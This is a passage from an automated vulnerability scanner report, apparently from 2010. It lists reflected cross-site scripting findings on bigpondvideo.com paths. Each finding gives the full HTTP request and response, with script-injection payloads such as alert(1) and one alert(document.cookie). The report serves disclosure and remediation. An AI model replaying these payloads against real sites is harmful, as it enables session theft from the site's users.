HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:49 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=742f05fed231622424602a00ff82a961; path=/ Content-Type: text/html Connection: close Content-Length: 58338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b91a34dc&platform=Production&phpSessionId=742f05fed231622424602a00ff82a961&bd5b1</script><script>alert(1)</script>a21cf603a85=1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1c92</script><script>alert(1)</script>9fcf93df57e was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ref=Net-Head-TVd1c92</script><script>alert(1)</script>9fcf93df57e HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:07:44 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3000e45d8&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TVd1c92</script><script>alert(1)</script>9fcf93df57e&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.450. http://bigpondvideo.com/AFL/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/AFL/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d11ca</script><script>alert(1)</script>59c968aaca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AFL/?d11ca</script><script>alert(1)</script>59c968aaca2=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:31 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302f8cc5e&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&d11ca</script><script>alert(1)</script>59c968aaca2=1&navId=6&channelTitle=AFL&targetLevel=Videos.Sport.AFL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 776b6</script><script>alert(1)</script>6d981e37a4e was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AFL/?ref=Net-Head-TV-Sport-AFL776b6</script><script>alert(1)</script>6d981e37a4e HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:26 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302a81502&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-AFL776b6</script><script>alert(1)</script>6d981e37a4e&navId=6&channelTitle=AFL&targetLevel=Videos.Sport.AFL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.452. http://bigpondvideo.com/GamesLatest/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/GamesLatest/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b69d</script><script>alert(1)</script>22ea0e71a0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GamesLatest/?7b69d</script><script>alert(1)</script>22ea0e71a0f=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:54 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30466a830&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&7b69d</script><script>alert(1)</script>22ea0e71a0f=1&navId=473&channelTitle=Latest&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4faba</script><script>alert(1)</script>f126320f05 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GamesLatest/?ref=Net-Head-TV-Games-Latest4faba</script><script>alert(1)</script>f126320f05 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:50 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... flashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb304266af5&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games-Latest4faba</script><script>alert(1)</script>f126320f05&navId=473&channelTitle=Latest&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.454. http://bigpondvideo.com/GamesTrailers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/GamesTrailers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266b2</script><script>alert(1)</script>eb13f22a9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GamesTrailers/?266b2</script><script>alert(1)</script>eb13f22a9b9=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:00 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb304d6e594&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&266b2</script><script>alert(1)</script>eb13f22a9b9=1&navId=304&channelTitle=Trailers&targetLevel=Videos.Games.Trailers.All Genres&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87559</script><script>alert(1)</script>baddc826b84 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GamesTrailers/?ref=Net-Head-TV-Games-Trailers87559</script><script>alert(1)</script>baddc826b84 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:48 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30410ef15&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games-Trailers87559</script><script>alert(1)</script>baddc826b84&navId=304&channelTitle=Trailers&targetLevel=Videos.Games.Trailers.All Genres&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.456. http://bigpondvideo.com/Music/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Music/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36449</script><script>alert(1)</script>4c6e1c63c21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Music/?36449</script><script>alert(1)</script>4c6e1c63c21=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:00 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb304dc68da&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&36449</script><script>alert(1)</script>4c6e1c63c21=1&navId=442&channelTitle=Music&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e3e</script><script>alert(1)</script>92592926c1f was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Music/?ref=Net-Head-TV-Music45e3e</script><script>alert(1)</script>92592926c1f HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:56 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30485771d&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Music45e3e</script><script>alert(1)</script>92592926c1f&navId=442&channelTitle=Music&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.458. http://bigpondvideo.com/NRL/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NRL/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f688</script><script>alert(1)</script>c21790034fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NRL/?1f688</script><script>alert(1)</script>c21790034fb=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:41 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303a1e2df&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&1f688</script><script>alert(1)</script>c21790034fb=1&navId=490&channelTitle=NRL&targetLevel=Videos.Sport.NRL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a0db</script><script>alert(1)</script>885f6c100d8 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NRL/?ref=Net-Head-TV-NRL1a0db</script><script>alert(1)</script>885f6c100d8 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:29 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... om/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb302d8cc44&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-NRL1a0db</script><script>alert(1)</script>885f6c100d8&navId=490&channelTitle=NRL&targetLevel=Videos.Sport.NRL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 request parameter is copied into the HTML document as plain text between tags. The payload a2e63<script>alert(1)</script>7eab4e8c706 was submitted in the c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NewsOnDemand/?c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289=1a2e63<script>alert(1)</script>7eab4e8c706 HTTP/1.1 Host: bigpondvideo.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_sv_sid=453774846568; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; s_cc=true; s_nr=1290483861171; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; gpv_p49=BigPond%20TV; gpv_e44=BigPond%20TV; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... </script>522ee782289=1a2e63<script>alert(1)</script>7eab4e8c706&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.461. http://bigpondvideo.com/NewsOnDemand/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/NewsOnDemand/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c014e</script><script>alert(1)</script>522ee782289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemand/?c014e</script><script>alert(1)</script>522ee782289=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:48:50 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; path=/ Content-Type: text/html Connection: close Content-Length: 58287
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb2b9290c30&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&c014e</script><script>alert(1)</script>522ee782289=1&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfc57</script><script>alert(1)</script>694f5b478ee was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NewsOnDemand/?ref=Net-Head-TV-Newsbfc57</script><script>alert(1)</script>694f5b478ee HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
